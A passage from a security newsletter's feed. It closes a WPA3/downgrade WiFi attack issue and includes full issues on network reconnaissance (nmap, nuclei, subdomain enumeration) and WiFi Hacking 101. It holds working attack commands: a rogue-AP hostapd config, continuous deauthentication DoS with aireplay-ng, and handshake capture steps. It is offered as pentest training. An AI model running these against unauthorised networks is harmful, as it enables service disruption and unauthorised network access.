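```python
# Rough cost of an online SAE dictionary attack at ~50 guesses per second
rockyou = 14_344_392   # line count of the classic rockyou.txt
rate = 50              # SAE exchanges per second (approximate)
hours = rockyou / rate / 3600
print(round(hours))    # roughly 80 hours to exhaust the full list
```

Three-plus days of continuous, noisy traffic for one wordlist. Curate aggressively before going online.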

The [Wacker script](https://github.com/blunderbuss-wctf/wacker) and the [airgeddon WPA3 online dictionary plugin](https://github.com/OscarAkaElvis/airgeddon-plugins) automate this. airgeddon ships a statically compiled patched wpa_supplicant for multiple architectures, so you don&apos;t need to build it yourself.

```bash
# airgeddon handles the WPA3 online dictionary attack via its plugin system
# It ships a patched wpa_supplicant and manages the SAE exchange loop
# Launch airgeddon and navigate to the WPA3 attack menu
sudo bash airgeddon.sh
```

This attack is loud. One full authentication per guess means lots of traffic, detectable by any WIDS. It may trigger account lockouts on more sophisticated AP implementations. Use this against targets where you have reason to believe the password is in your wordlist, and where detection risk is acceptable.

The takeaway on WPA3: it&apos;s meaningfully better than WPA2. Captured frames are useless for offline cracking. But &quot;better&quot; doesn&apos;t mean &quot;impervious.&quot; Weak passwords are still crackable online. DoS attacks still work. And most networks aren&apos;t running pure WPA3.

## 🔀 WPA2/3 Transitional: The Downgrade Problem

Here&apos;s the real-world situation. Network admins want WPA3 security, but they also have legacy devices that only support WPA2. The solution is transitional (mixed) mode: the AP advertises both WPA2-PSK and WPA3-SAE simultaneously, and clients connect with whichever they support.

This sounds reasonable. In practice, it inherits every WPA2 weakness.

The attack: force a WPA3-capable victim to connect via WPA2.

**How the downgrade works:**

1. Identify a transitional network (supporting both WPA2 and WPA3).
2. Set up a fake AP advertising only WPA2, same SSID.
3. Perform DoS against the legitimate AP.
4. The victim&apos;s device falls back to your fake WPA2 AP via its Preferred Network List (PNL).
5. Capture the WPA2 handshake. Even capturing half the handshake (messages 1 and 2 of 4) is sufficient for offline cracking.
6. Crack offline with hashcat as normal.

The downgrade succeeds if any WPA2 clients are visible on the network, or if WPA3 clients aren&apos;t enforcing MFP (which is common in transitional mode for compatibility reasons).
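
The rogue-AP step can be sketched as a minimal hostapd config. This is a hedged example: the interface name, SSID, channel, and passphrase are placeholders, and tools like airgeddon automate the whole chain for you:

```
# WPA2-only rogue AP mirroring a transitional network&apos;s SSID (sketch)
interface=wlan0
ssid=TargetSSID
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
# Any passphrase works here: the victim computes its handshake MIC from the
# real password, and messages 1-2 are all you need for offline cracking
wpa_passphrase=anything123
```

Run `hostapd` against this config while the legitimate AP is under DoS, and capture with airodump-ng on the same channel.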

**Detecting transitional networks in Wireshark:**

```
wlan.rsn.akms.type == 2 &amp;&amp; wlan.rsn.akms.type == 8
```

This filter shows beacon frames that advertise both PSK (AKM type 2) and SAE (AKM type 8), which is the fingerprint of a transitional network.

The practical security posture of a transitional network is effectively WPA2. If you support WPA2, you&apos;re vulnerable to WPA2 attacks. The WPA3 component provides no meaningful protection against a downgrade-capable adversary.

## 🎯 Key Takeaways

**WPA/WPA2 handshake cracking** is offline and uncapped. Capture once, crack forever. Security is entirely passphrase-dependent. Use GPU cracking with hashcat `-m 22000`. Apply rule-based attacks, not just raw wordlists.

**PMKID** changed the game in 2018. Clientless extraction, same cracking workflow. One auth packet, walk away with the hash. No waiting for clients, no deauth noise.

**WPS is still everywhere.** Check every AP. Pixie Dust is instant on vulnerable chipsets. Null PIN works on some implementations. Brute-force is feasible at ~11,000 combinations. Known PIN databases catch the rest. Always check WPS status during wireless assessments.

**WPA3 solves the offline cracking problem.** SAE-derived PMKs make captured handshakes useless. But online dictionary attacks work (slowly). Dragon Drain can DoS WPA3 APs. And most networks aren&apos;t running pure WPA3.

**Transitional networks reduce to WPA2.** Downgrade attacks work when any WPA2 clients exist or when WPA3 clients don&apos;t enforce MFP. Mixed-mode networks inherit mixed-mode attack surface.

---

That&apos;s it for Part 2!

WPA2 is crackable if the password is weak. WPS is crackable in a lot of cases regardless of password strength. WPA3 raises the bar but doesn&apos;t eliminate attack paths. And transitional networks give you WPA3&apos;s branding with WPA2&apos;s weaknesses.

This series has one more issue left. Part 3 covers enterprise networks: WPA2-Enterprise (802.1X/MGT), RADIUS, PEAP/EAP-TLS configurations, relay attacks, ESSID stripping, and how to attack certificate-based authentication. Enterprise WiFi has a very different attack surface, and it shows up in almost every corporate engagement.

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>Infrastructure Reconnaissance: Your First Steps in Network Pentesting</title><link>https://www.kayssel.com/newsletter/issue-36</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-36</guid><description>From nmap and nuclei to full infrastructure enumeration: a practical guide to discovering attack surface in bug bounty and pentesting</description><pubDate>Sun, 08 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Funny how this works. I&apos;ve spent months covering complex offensive security topics. Web3 signature exploitation, Active Directory attacks, Kubernetes escapes, deserialization chains. But somehow I never wrote about the absolute basics.

nmap. nuclei. Subdomain enumeration. The tools you literally use on day one of every infrastructure assessment or bug bounty program.

This is pentesting 101. The foundation everything else builds on. Whether you just landed your first infrastructure pentest, want to get into bug bounty, or need to refresh the fundamentals, this is where you start. You can&apos;t exploit an Active Directory environment if you can&apos;t enumerate the network. You can&apos;t find Web3 API vulnerabilities if you don&apos;t know how to discover endpoints.

And while the methodology hasn&apos;t changed, the tooling has evolved massively. Modern reconnaissance frameworks automate workflows that used to take days. Nuclei runs 10,000+ vulnerability templates in minutes. Subdomain enumeration now leverages certificate transparency and passive DNS datasets at scale.

This week we&apos;re covering the complete infrastructure reconnaissance workflow from zero. Port scanning with nmap, masscan, and rustscan. Vulnerability detection with nuclei. Subdomain enumeration strategies. SSL/TLS analysis. And how to chain everything into a systematic methodology you can use on your next engagement.

Let&apos;s build that attack surface map 👇

## 🎯 The Methodology

Infrastructure recon isn&apos;t about randomly running tools. You&apos;re building a complete picture of the attack surface, layer by layer.

**Phase 1: Network Discovery** - Find live hosts and open ports. This gives you the initial surface.

**Phase 2: Service Enumeration** - Extract versions, configurations, protocols. This reveals specific attack vectors.

**Phase 3: Vulnerability Scanning** - Map known CVEs to enumerated services.

**Phase 4: Subdomain Enumeration** - Expand the surface. Dev servers and staging environments are often less secured.

**Phase 5: SSL/TLS Analysis** - Test crypto configs. Weak ciphers and cert issues lead to MITM or info disclosure.

Each phase informs the next. Ports reveal services. Services reveal versions. Versions map to CVEs.

## 🔍 Port Scanning with nmap

[nmap](https://nmap.org/) is the standard. You&apos;re testing infrastructure? You&apos;re using nmap.

**Basic scans:**

```bash
# Top 1000 ports
nmap 10.0.0.1

# Specific ports
nmap -p 80,443,8080 10.0.0.1

# All ports
nmap -p- 10.0.0.1
```

**SYN scan (faster, stealthier):**

```bash
# Default for privileged users
sudo nmap -sS 10.0.0.1

# Skip ping (useful if ICMP blocked)
sudo nmap -Pn -sS 10.0.0.1
```

SYN scans don&apos;t complete the TCP handshake. Faster and less likely to trigger application logs.

**Service detection:**

```bash
# Detect versions
nmap -sV 10.0.0.1

# Aggressive detection
nmap -sV --version-intensity 9 10.0.0.1

# OS + version
sudo nmap -A 10.0.0.1
```

You need exact versions to map CVEs. `OpenSSH 7.2p2` has different vulns than `8.0p1`.

**Timing (speed vs stealth):**

```bash
# Slow and stealthy (IDS evasion)
nmap -T1 10.0.0.1

# Normal (default)
nmap -T3 10.0.0.1

# Aggressive (faster)
nmap -T4 10.0.0.1
```

Bug bounty and authorized tests? Use `-T4`. Red team where stealth matters? `-T1` or `-T2`.

**NSE scripts (the real power):**

nmap includes [600+ NSE scripts](https://nmap.org/nsedoc/) for vulnerability detection and advanced enumeration:

```bash
# Default scripts + version detection
nmap -sC -sV 10.0.0.1

# Specific script
nmap --script http-title 10.0.0.1

# All HTTP scripts
nmap --script &quot;http-*&quot; -p 80,443 10.0.0.1

# Vulnerability scripts
nmap --script vuln 10.0.0.1

# SMB enumeration
nmap --script smb-os-discovery,smb-enum-shares -p 445 10.0.0.1
```

NSE automates recon that would otherwise need manual testing. `http-title` grabs page titles. `smb-enum-shares` lists shares. `ssl-cert` extracts certificate SANs (great for subdomain discovery).

**Web server enumeration:**

```bash
# Comprehensive web enum
sudo nmap -Pn -sS -sV -p 80,443,8000-8443 \
  --script http-title,http-headers,ssl-cert \
  10.0.0.1
```

**Always save outputs:**

```bash
# All formats
nmap -oA scan 10.0.0.1
```

## ⚡ Speed Scanning

nmap is thorough but slow on large networks. [masscan](https://github.com/robertdavidgraham/masscan) trades thoroughness for raw speed.

```bash
# Scan all ports (very fast)
sudo masscan 10.0.0.1 -p0-65535 --rate 10000

# Common web ports across /24
sudo masscan 10.0.0.0/24 -p80,443,8080,8443 --rate 5000
```

masscan is stateless and asynchronous. Blazing fast but less accurate.

**Best workflow: masscan + nmap**

```bash
# Step 1: masscan finds ports
sudo masscan 10.0.0.0/24 -p0-65535 --rate 10000 -oL masscan.txt

# Step 2: nmap enumerates those specific ports
# Parse masscan output and feed to nmap
```

Combine masscan&apos;s speed with nmap&apos;s accuracy.

**rustscan alternative:**

[rustscan](https://github.com/RustScan/RustScan) is modern, fast, and pipes directly to nmap:

```bash
# Automatically pipes to nmap
rustscan -a 10.0.0.1

# All ports, aggressive
rustscan -a 10.0.0.1 -r 1-65535 -- -A -T4
```

## 🎯 Vulnerability Scanning with nuclei

[nuclei](https://github.com/projectdiscovery/nuclei) by ProjectDiscovery is the standard for automated vulnerability detection in bug bounty. Template-based, fast, and community-driven.

More than [10,000 templates](https://github.com/projectdiscovery/nuclei-templates) covering CVEs, misconfigurations, exposed panels, and more.

**Note**: I cover nuclei in depth in my [Web Pentesting Fundamentals series](/series/web-pentest-fundamentals), including custom template creation and advanced workflows. This section gives you the essentials to get started.

**Setup:**

```bash
# Install
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Update templates (do this regularly)
nuclei -ut
```

**Basic usage:**

```bash
# Scan single target
nuclei -u https://example.com

# Scan multiple targets
nuclei -l targets.txt

# Critical and high severity only
nuclei -u https://example.com -severity critical,high

# Specific tech (WordPress, Laravel, etc)
nuclei -u https://example.com -tags wordpress

# Specific CVE
nuclei -u https://example.com -tags cve2024
```

**Filtering:**

```bash
# CVE templates only
nuclei -u https://example.com -t http/cves/

# Misconfiguration templates
nuclei -u https://example.com -t http/misconfiguration/

# Exclude DOS/fuzzing
nuclei -u https://example.com -etags dos,fuzz
```

**Rate limiting:**

```bash
# Limit requests per second
nuclei -u https://example.com -rate-limit 50

# Custom headers (auth, WAF bypass)
nuclei -u https://example.com -H &quot;Authorization: Bearer token&quot;
```

**Writing custom templates:**

This is where nuclei shines. Custom templates for specific targets:

```yaml
id: custom-admin-panel

info:
  name: Custom Admin Panel Detection
  author: yourname
  severity: info
  tags: panel,exposure

http:
  - method: GET
    path:
      - &quot;{{BaseURL}}/admin-secret&quot;
      - &quot;{{BaseURL}}/secret-panel&quot;

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - &quot;Admin Login&quot;
          - &quot;Dashboard&quot;
        condition: or
```

Save as `custom.yaml`:

```bash
nuclei -u https://example.com -t custom.yaml
```

**CVE template example:**

```yaml
id: CVE-2024-example

info:
  name: Example Product RCE
  author: yourname
  severity: critical
  classification:
    cve-id: CVE-2024-example

http:
  - raw:
      - |
        POST /api/upload HTTP/1.1
        Host: {{Hostname}}

        {&quot;file&quot;:&quot;test.php&quot;,&quot;exec&quot;:&quot;true&quot;}

    matchers:
      - type: word
        words:
          - &quot;upload successful&quot;
        condition: or
```

Check the [template guide](https://docs.projectdiscovery.io/templates/introduction) for full syntax.

**Bug bounty workflow:**

```bash
# Discover subdomains
subfinder -d example.com -o subs.txt

# Find live hosts
cat subs.txt | httpx -silent -o live.txt

# Scan for vulns
nuclei -l live.txt -severity critical,high
```

This pipeline discovers subdomains, identifies live hosts, and scans for vulnerabilities in minutes.

## 🌐 Subdomain Enumeration

Subdomain enum expands your attack surface. Forgotten staging servers and dev environments are often less secured than production.

**Certificate Transparency:**

[crt.sh](https://crt.sh/) logs every issued SSL certificate publicly. Perfect for subdomain discovery.

```bash
# Query crt.sh API
curl -s &quot;https://crt.sh/?q=%25.example.com&amp;output=json&quot; | \
  jq -r &apos;.[].name_value&apos; | sed &apos;s/\*\.//g&apos; | sort -u
```

**subfinder (passive):**

[subfinder](https://github.com/projectdiscovery/subfinder) aggregates 30+ sources (crt.sh, VirusTotal, Shodan):

```bash
# Install
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

# Basic
subfinder -d example.com

# All sources
subfinder -d example.com -all -o subs.txt
```

**amass (passive + active):**

[OWASP Amass](https://github.com/owasp-amass/amass) is more aggressive. Active DNS brute-forcing:

```bash
# Passive only
amass enum -passive -d example.com

# Active with brute-force
amass enum -active -brute -d example.com -o amass.txt
```

**assetfinder (fast and simple):**

[assetfinder](https://github.com/tomnomnom/assetfinder) by Tom Hudson:

```bash
# Install
go install github.com/tomnomnom/assetfinder@latest

# Basic usage
assetfinder --subs-only example.com
```

**DNS brute-forcing with puredns:**

```bash
# Install
go install github.com/d3mondev/puredns/v2@latest

# Brute-force
puredns bruteforce wordlist.txt example.com
```

Use [SecLists DNS wordlist](https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-110000.txt).

**httpx (probe live hosts):**

```bash
# Install
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

# Probe discovered subdomains
cat subs.txt | httpx -silent -o live.txt
```

**Complete workflow:**

```bash
# Passive enum
subfinder -d example.com &gt; subs1.txt
assetfinder --subs-only example.com &gt; subs2.txt

# Combine
cat subs1.txt subs2.txt | sort -u &gt; all_subs.txt

# DNS brute-force (optional)
puredns bruteforce wordlist.txt example.com &gt;&gt; all_subs.txt

# Probe live
cat all_subs.txt | httpx -silent -o live.txt

# Scan
nuclei -l live.txt -severity critical,high
```

## 🔐 SSL/TLS Analysis

SSL/TLS misconfigs lead to MITM, info disclosure, and compliance violations.

**testssl.sh:**

[testssl.sh](https://github.com/drwetter/testssl.sh) tests protocols, ciphers, cert validity, and known vulns:

```bash
# Clone
git clone --depth 1 https://github.com/drwetter/testssl.sh.git

# Basic scan
./testssl.sh https://example.com

# Check vulnerabilities
./testssl.sh --vulnerable https://example.com

# JSON output
./testssl.sh --json --jsonfile results.json https://example.com
```

Checks for weak protocols (SSLv2, SSLv3, TLS 1.0), weak ciphers, cert issues, and vulns (POODLE, Heartbleed, DROWN).

**Extract SANs for subdomain discovery:**

```bash
# Extract SANs from cert
echo -n | openssl s_client -connect example.com:443 2&gt;/dev/null | \
  sed -ne &apos;/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p&apos; | \
  openssl x509 -text -noout | \
  grep -A1 &quot;Subject Alternative Name&quot; | \
  grep DNS: | sed &apos;s/DNS://g&apos; | tr &apos;,&apos; &apos;\n&apos;
```

Or with nmap:

```bash
nmap --script ssl-cert -p 443 example.com
```

## 🛠️ Automation Frameworks

[reconftw](https://github.com/six2dez/reconftw) automates the entire workflow:

```bash
# Clone and install
git clone https://github.com/six2dez/reconftw
cd reconftw &amp;&amp; ./install.sh

# Full recon
./reconftw.sh -d example.com -r
```

reconftw chains subfinder, amass, httpx, nuclei, and more into one workflow.

[recon-ng](https://github.com/lanmaster53/recon-ng) is modular like Metasploit:

```bash
# Kali ships recon-ng as a package; otherwise install from source
git clone https://github.com/lanmaster53/recon-ng
cd recon-ng &amp;&amp; pip3 install -r REQUIREMENTS
./recon-ng

# Create workspace
workspaces create example_recon

# Load module
modules load recon/domains-hosts/certificate_transparency
options set SOURCE example.com
run
```

## 🎯 Key Takeaways

Infrastructure recon is the foundation. You can&apos;t exploit what you can&apos;t find. Master port scanning, service enumeration, and subdomain discovery before moving to exploitation.

nmap is still the gold standard. NSE scripts automate vulnerability checks and advanced recon. Combine masscan or rustscan for speed, then nmap for accuracy.

nuclei automates vulnerability detection at scale. Over 10,000 templates covering CVEs and misconfigs. Write custom templates for specific targets.

Subdomain enumeration expands attack surface exponentially. Use subfinder and amass for passive discovery, puredns for brute-forcing, httpx for probing. Staging servers are prime targets.

Certificate Transparency logs are gold mines. Every SSL cert is logged publicly. Extract SANs for subdomain discovery.

Automation is essential. reconftw chains subdomain enum, port scanning, and vulnerability scanning into single workflows.

---

That&apos;s it for this week.

This is foundational stuff. Every infrastructure assessment starts here. Master nmap syntax. Learn nuclei templates. Build subdomain enum workflows. Practice on bug bounty programs and HTB.

The attack surface is out there. Go find it.

Thanks for reading, and happy hunting!

— Ruben</content:encoded><category>Newsletter</category><category>infrastructure-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: Breaking Into Wireless Networks (Part 1)</title><link>https://www.kayssel.com/newsletter/issue-35</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-35</guid><description>A practical introduction to WiFi security testing covering the fundamentals, essential hardware, monitor mode, packet injection, and initial attack techniques</description><pubDate>Sun, 01 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Last week I spent two days in a WiFi security course taught by [@OscarAkaElvis](https://twitter.com/OscarAkaElvis) (creator of [airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon)). Hands-on training, proper hardware, and an instructor who actually knew his stuff. I learned more about 802.11 exploitation in those two days than I had in years of reading blog posts and documentation.

Here&apos;s what surprised me most. WiFi hacking isn&apos;t some black magic reserved for elite hackers. The fundamentals are straightforward. The tools are mature and well-documented. The attack vectors are proven and reproducible. What was hard ten years ago is now point-and-click with the right hardware and tools.

But there&apos;s a catch. Nobody teaches this systematically. You find scattered blog posts about deauth attacks. YouTube videos showing WPA cracking without explaining why it works. Tools documentation that assumes you already understand 802.11 fundamentals.

That&apos;s why I&apos;m writing this. I want to share what I learned in a way that actually makes sense. Start with why WiFi is such a massive attack surface. Cover the fundamentals you need to understand the attacks. Explain the hardware requirements. Show you how to set up your testing environment properly. Then walk through the attack techniques step by step.

This is Part 1, covering fundamentals, hardware, setup, and basic attacks. The advanced stuff (WPA/WPA2 cracking, PMKID attacks, WPS exploitation, WPA3, and enterprise networks) comes next.

If you&apos;ve ever wanted to understand WiFi hacking but found it overwhelming, this is your starting point.

Let&apos;s break some WiFi 👇

## 📡 Why WiFi Security Matters

Wireless networks are everywhere, broadcasting constantly to anyone within range. Unlike wired networks requiring physical access, WiFi extends beyond walls. Park outside an office building and you can see dozens of potential entry points.

The security models are fundamentally flawed. WEP was broken in 2001. WPA2 (still the most common standard) has been compromised via KRACK attacks, PMKID extraction, and implementation bugs. Even WPA3 suffered from Dragonblood attacks within a year of release.

Organizations treat WiFi as an afterthought. Default passwords on access points. WPS enabled. Weak PSKs. No client isolation. Meanwhile, they invest heavily in firewalls and IDS/IPS while the wireless network sits misconfigured since initial setup.

The attack vectors are practical. Capture a WPA2 handshake and crack it offline. No rate limiting. No account lockouts. Just your GPU and a wordlist. The barrier to entry is low: a $20-50 adapter, free open-source tools, and well-documented techniques.

This is why every pentester needs to understand WiFi security. It&apos;s often the easiest way into a network.

## 🔧 Essential Hardware

You can&apos;t hack WiFi with any random adapter. Your laptop&apos;s built-in WiFi card probably won&apos;t cut it. You need hardware that supports **monitor mode** and **packet injection**.

**Monitor mode** lets your adapter capture all wireless traffic in range, not just traffic directed to your MAC address. This is how you see handshakes, deauth frames, beacon frames, everything happening on the network.

**Packet injection** lets you send arbitrary 802.11 frames. This is critical for deauth attacks, ARP replay attacks, and many other techniques. Without injection capability, you&apos;re severely limited in what attacks you can perform.

### Recommended Adapters

**ALFA AWUS036ACH** ($40-50) - Industry standard. Realtek RTL8812AU chipset, dual-band 2.4/5GHz, excellent range. Monitor mode and injection work out of the box. This is what you&apos;ll see in every WiFi security course.

**ALFA AWUS036ACM** ($45-55) - Better for advanced attacks. MediaTek MT7612U chipset with superior injection performance. Get this if you&apos;re serious about WiFi testing.

**TP-Link TL-WN722N v1** ($20-30) - Budget option. Atheros AR9271, single-band 2.4GHz only. Critical: only v1.x works, v2/v3 don&apos;t support injection.

**Panda PAU09 N600** ($30-40) - Ralink RT5572, reliable dual-band alternative.

### Key Considerations

Chipset matters more than brand. Avoid Broadcom (poor Linux support), Realtek RTL8188EU (no injection support), and Intel (limited monitor mode).

External antennas extend range dramatically. Standard adapters work for close-range testing within 10-50 meters. Need to test from farther away? Get an adapter with RP-SMA connector and add a directional antenna. Suddenly you&apos;re pulling networks from 300+ meters away.

### Driver Installation

```bash
# Note: Drivers may break after kernel updates - reinstall if needed

# For RTL8812AU (ALFA AWUS036ACH)
git clone https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au
make
sudo make install

# For MT7612U (ALFA AWUS036ACM)
# Usually works out of the box with mt76x2u driver
# If the interface doesn&apos;t appear, check dmesg for missing firmware and
# install your distro&apos;s linux-firmware package; no out-of-tree driver needed

# Verify your adapter is recognized
iwconfig
# You should see your wireless interface (usually wlan0, wlan1, wlx...)
```

## 📻 WiFi Fundamentals

You need to understand the basics of how WiFi works before you can break it. This isn&apos;t theory for the sake of theory. These concepts directly relate to exploitation.

### Bands and Channels

WiFi operates on two main frequency bands. The 2.4 GHz band uses channels 1-13 (US uses 1-11), with each channel being 20 MHz wide. Channels overlap, and only 1, 6, and 11 are non-overlapping. You get better range but worse speed. It&apos;s more crowded because everyone uses 2.4 GHz, and legacy devices only support this band.

The 5 GHz band has many more channels (36, 40, 44, 48, and up). It&apos;s less crowded with better throughput, but shorter range and less wall penetration. Modern high-speed networks require 5 GHz.

Why this matters for attacks: you need to target the right band and channel. Your adapter must support the band the target network uses. Most home networks are still 2.4 GHz. Enterprise networks often use both.
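
For reference, 2.4 GHz channel numbers map to center frequencies as 2407 + 5 × channel MHz (channel 14, Japan-only, is the exception at 2484). Handy when a tool wants a frequency instead of a channel number:

```bash
# 2.4 GHz center frequency in MHz (valid for channels 1-13)
chan2freq() { echo $((2407 + 5 * $1)); }

chan2freq 1    # 2412
chan2freq 6    # 2437
chan2freq 11   # 2462
```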

### Operating Modes

WiFi adapters operate in different modes:

**Managed**: The default. Normal client mode where you connect to access points like a regular device.

**Monitor**: Promiscuous mode for WiFi, capturing all traffic on the channel, not just traffic for your MAC address. Essential for packet capture and analysis.

**Master**: Your adapter acts as an access point. Used for Evil Twin attacks.

**Ad-hoc**: Direct device-to-device communication without an access point.

### Virtual Interfaces (VIF)

Modern drivers support multiple virtual interfaces on one physical adapter. You can run monitor mode while staying connected to a network.

```bash
# Create virtual monitor interface
iw dev wlan0 interface add mon0 type monitor
# wlan0 stays in managed mode, mon0 captures traffic
```

Note: VIF support varies by driver. If you hit issues, use single-interface mode.

### Authentication and Encryption

**Open (OPN)**: No auth, no encryption. Traffic in plaintext. Common in public spaces.

**WEP**: Deprecated in 2004, completely broken. Crackable in minutes.

**WPA/WPA2-PSK**: Standard for home/small business. Security depends on passphrase strength.

**WPA2-Enterprise (802.1X)**: RADIUS authentication, individual credentials. Common in corporate environments.

**WPA3**: Latest standard with improved key exchange (SAE), forward secrecy, and offline attack protection. Low adoption, vulnerable to Dragonblood attacks.

## 🎯 Setting Up Your Testing Environment

You&apos;ve got your hardware. Time to configure your environment properly.

### Enable Monitor Mode

```bash
# Kill processes that might interfere
sudo airmon-ng check kill

# Enable monitor mode on your interface
sudo airmon-ng start wlan0

# This creates a monitor interface (usually wlan0mon)
# Verify it&apos;s in monitor mode
iwconfig
```

### Test Packet Injection

Packet injection is critical. Test it before attempting attacks.

```bash
# Install aireplay-ng (part of aircrack-ng suite)
sudo apt install aircrack-ng

# Test injection on your monitor interface
sudo aireplay-ng --test wlan0mon

# Successful output looks like:
# Injection is working!
# Found X APs
```

If injection fails:
- Check driver installation
- Verify chipset supports injection
- Try a different USB port (USB 2.0 vs 3.0 can matter)
- Check dmesg for errors: `dmesg | tail -50`

### Channel Hopping

Monitor mode captures traffic on one channel at a time. To see all networks, you need to hop between channels.

```bash
# Hop through all 2.4 GHz channels
sudo airodump-ng wlan0mon

# Hop only on specific channels (1, 6, 11 - the non-overlapping ones)
sudo airodump-ng --channel 1,6,11 wlan0mon

# Lock to a specific channel (important when capturing handshakes)
sudo airodump-ng --channel 6 wlan0mon
```

### Organize Your Captures

Create a dedicated directory structure for your captures:

```bash
mkdir -p ~/wifi-testing/{captures,wordlists,handshakes,results}

# When capturing, save to organized directories
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w ~/wifi-testing/captures/target_network wlan0mon
```

## 🔍 Reconnaissance and Network Discovery

Now that your adapter is in monitor mode, time to see what networks are around you.

### Basic Network Discovery

```bash
# Scan all networks in range
sudo airodump-ng wlan0mon
```

Key fields:
- **BSSID**: AP MAC address
- **PWR**: Signal strength (closer to 0 = stronger)
- **CH**: Channel
- **ENC**: Encryption (OPN, WEP, WPA, WPA2, WPA3)
- **AUTH**: Authentication method (PSK, MGT, OWE)
- **ESSID**: Network name

Bottom section shows **connected clients** and their **probe requests** (networks they&apos;re looking for).

### Focus on a Target Network

Once you identify a target, focus your capture on that network:

```bash
# Lock to the target&apos;s channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# -c 6: Lock to channel 6
# --bssid: Target network&apos;s MAC address
# -w capture: Save to capture-01.cap, capture-01.csv, etc.
```

### Identify Hidden Networks

Some networks hide their SSID (don&apos;t broadcast the network name in beacons). They show up as `&lt;length: X&gt;` in airodump-ng.

**How to reveal hidden SSIDs:**

When a client connects to a hidden network, it sends the SSID in probe request frames. Capture these frames to reveal the name.

```bash
# Keep capturing against the target; the ESSID column fills in once a
# client&apos;s probe or association frames are captured
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon

# Or force a client to reconnect (deauth attack - covered next)
# This causes the client to send a probe request with the SSID
```

## 💥 Basic Attack Techniques

Let&apos;s start with the fundamental attacks every WiFi pentester needs to know.

### Deauthentication Attacks

Deauth attacks disconnect clients from a network. They&apos;re one of the most versatile WiFi attack primitives.

How it works: 802.11 management frames like deauth frames are unauthenticated in WPA/WPA2. You can spoof them. Send deauth frames claiming to be from the access point, and clients disconnect.

**Perform a deauth attack:**

```bash
# Deauth all clients from a network
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# --deauth 10: Send 10 deauth frames
# -a: Target access point BSSID

# Deauth a specific client
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# -c: Target client MAC address
```

**What you&apos;ll see:**

Clients disconnect. They usually reconnect within seconds. If you&apos;re running airodump-ng, you&apos;ll see the &quot;WPA handshake&quot; message when the client reconnects. This handshake is what you need for WPA/WPA2 cracking (covered in Part 2).

**Continuous deauth (DoS):**

```bash
# Send deauth frames continuously (0 = infinite)
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# Stop with Ctrl+C
```

### Management Frame Protection (MFP)

WPA3 and newer WPA2 implementations support **802.11w Management Frame Protection**. This protects management frames (like deauth) from spoofing.

**How to detect MFP:**

```bash
# Check airodump-ng output for &quot;MFP&quot; in capabilities
sudo airodump-ng wlan0mon

# Or parse beacon frames with Wireshark
# Look for RSN Information Element with MFP capability
```
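
For a beacon-level check in Wireshark, these display filters target the RSN capabilities bits directly (field names as exposed by recent Wireshark builds):

```
wlan.rsn.capabilities.mfpr == 1   # MFP required
wlan.rsn.capabilities.mfpc == 1   # MFP capable but optional
```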

**If MFP is enabled:** Deauth attacks won&apos;t work. You can&apos;t disconnect clients. This significantly reduces your attack surface. However, MFP adoption is still low. Most networks don&apos;t have it enabled.

### Open Network Exploitation

Open networks (OPN) have no encryption. All traffic is plaintext. This is the easiest target.

**Connect to open networks:**

```bash
# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Connect to the open network
sudo nmcli dev wifi connect &quot;Network_Name&quot;
```

**Capture and analyze traffic:**

```bash
# Capture in monitor mode
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w open_network wlan0mon

# Analyze with Wireshark
wireshark open_network-01.cap
```

You&apos;ll see HTTP requests, cookies, session tokens, DNS queries, and unencrypted protocols. While most sites use HTTPS, you&apos;ll still find plaintext traffic from legacy HTTP sites, poorly-coded mobile apps, IoT devices, and printers.

### OWE (Opportunistic Wireless Encryption)

OWE is the modern replacement for open networks. Provides encryption without authentication. Protects against passive eavesdropping while keeping the &quot;no password required&quot; convenience.

**How to identify OWE networks:**

```bash
# Look for &quot;OWE&quot; in the AUTH column of airodump-ng
sudo airodump-ng wlan0mon
```

**OWE networks appear open but encrypt traffic.** You can&apos;t simply capture plaintext traffic. However, OWE doesn&apos;t prevent Evil Twin attacks (covered in Part 2).

### Traffic Interception with Wireshark

Captured packets need analysis. Wireshark is your tool.

**Open captures:**

```bash
# Launch Wireshark
wireshark capture-01.cap
```

**Key Wireshark filters:**

```
eapol                           # WPA handshakes
wlan.fc.type_subtype == 0x0c    # Deauth frames
wlan.fc.type_subtype == 0x04    # Probe requests
wlan.addr == aa:bb:cc:dd:ee:ff  # Filter by BSSID
```

Export objects via `File -&gt; Export Objects -&gt; HTTP` to extract transferred files.

## 🎯 Key Takeaways

Hardware matters. Get an adapter that supports monitor mode and packet injection. The ALFA AWUS036ACH is the industry standard. Don&apos;t waste time fighting with unsupported hardware.

Understanding the fundamentals (bands, channels, operating modes, authentication methods) directly informs your attack strategy. These aren&apos;t academic concepts.

Deauth attacks are your Swiss Army knife. They force handshake captures, test DoS resilience, and prepare for Evil Twin attacks. They work on most networks because Management Frame Protection adoption is still low.

